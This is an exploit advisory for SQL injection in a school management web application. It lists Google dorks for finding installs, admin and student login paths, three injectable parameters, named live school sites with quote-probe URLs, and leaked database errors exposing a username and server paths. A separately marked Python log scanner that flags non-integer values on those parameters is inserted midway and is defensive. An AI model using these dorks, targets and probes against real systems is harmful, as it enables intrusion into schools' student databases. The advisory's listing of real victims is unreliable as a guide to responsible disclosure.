#####################################################################
# Exploit Title : Sikder Computer Center Mathbaria Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : sikdercomputer.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Design & Developed by Sikder Computer, Mathbaria'' site:edu.bd
intext:''Powered by Sikder Computer'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-sikder-computer-center-mathbaria-bd-sql-injection.html?pid=182084#pid182084
#####################################################################
# Admin/Teacher/Student Panel Login Path :
***************************************
/PATH/admin/index
/PATH/students_panel/index
# SQL Injection Exploit :
***********************
[PATH]/view_gallery_meetings?page=[SQL Injection]
[PATH]/current_success_students_info?id=[SQL Injection]
[PATH]/ex_success_students_info?id=[SQL Injection]
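Added example, not part of the original advisory or the vendor's code: a Python check that scans web-server access logs for requests to the three endpoints listed above whose page/id value is not a plain integer (for instance a trailing %27). The combined log format, the sample log lines and the /school/ path are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint -> parameter pairs, as listed in the advisory.
WATCHED = {
    "view_gallery_meetings": "page",
    "current_success_students_info": "id",
    "ex_success_students_info": "id",
}
# Assumption: common/combined log format with the request line in double quotes.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"[0-9]{1,10}")  # these parameters should only carry record/page numbers

# Constructed sample lines (documentation IP ranges, hypothetical /school/ install path).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jan/2019:10:00:01 +0000] "GET /school/view_gallery_meetings?page=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/Jan/2019:10:00:05 +0000] "GET /school/view_gallery_meetings?page=1%27 HTTP/1.1" 200 812',
    '198.51.100.7 - - [08/Jan/2019:10:00:09 +0000] "GET /school/current_success_students_info.php?id=16%27 HTTP/1.1" 200 790',
    '192.0.2.10 - - [08/Jan/2019:10:00:12 +0000] "GET /school/ex_success_students_info?id=4 HTTP/1.1" 200 4300',
    '192.0.2.44 - - [08/Jan/2019:10:00:15 +0000] "GET /school/notice?id=abc HTTP/1.1" 200 100',
]

def scan_line(line):
    """Return (endpoint, parameter, decoded value) for a flagged request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    endpoint = url.path.rstrip("/").rsplit("/", 1)[-1].removesuffix(".php")
    param = WATCHED.get(endpoint)
    if param is None:
        return None  # not one of the advisory's endpoints
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == param and not INT_RE.fullmatch(value):
            return endpoint, param, value  # value is already percent-decoded
    return None

def scan(lines):
    """Collect every flagged request from an iterable of log lines."""
    return [hit for hit in map(scan_line, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule is what the application should enforce on these parameters before they reach a query.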
#####################################################################
# Example Vulnerable Sites =>
*****************************
Note : (67.23.238.179) => There are 1,107 domains hosted on this server.
[+] sbss.edu.bd/sonar/view_gallery_meetings?page=1%27
[+] nalivimss.edu.bd/nali/view_gallery_meetings?page=1%27
[+] laylamalekia.edu.bd/layla/current_success_students_info?id=16%27
#####################################################################
# SQL Database Error :
*********************
Warning: mysql_connect(): Access denied for user 'nalivims_sms'@'localhost' (using password: YES) in /home/nalivimssedu/public_html/nali/admin/config/config.php on line 3
Warning: mysql_select_db() expects parameter 2 to be resource, boolean given in /home/nalivimssedu/public_html/nali/admin/config/config.php on line 5
Couldn't Connect to the database ***No database found ***
Warning: mysql_query(): Access denied for user ''@'localhost' (using password: NO) in /home/nalivimssedu/public_html/nali/view_gallery_meetings.php on line 19
#####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#####################################################################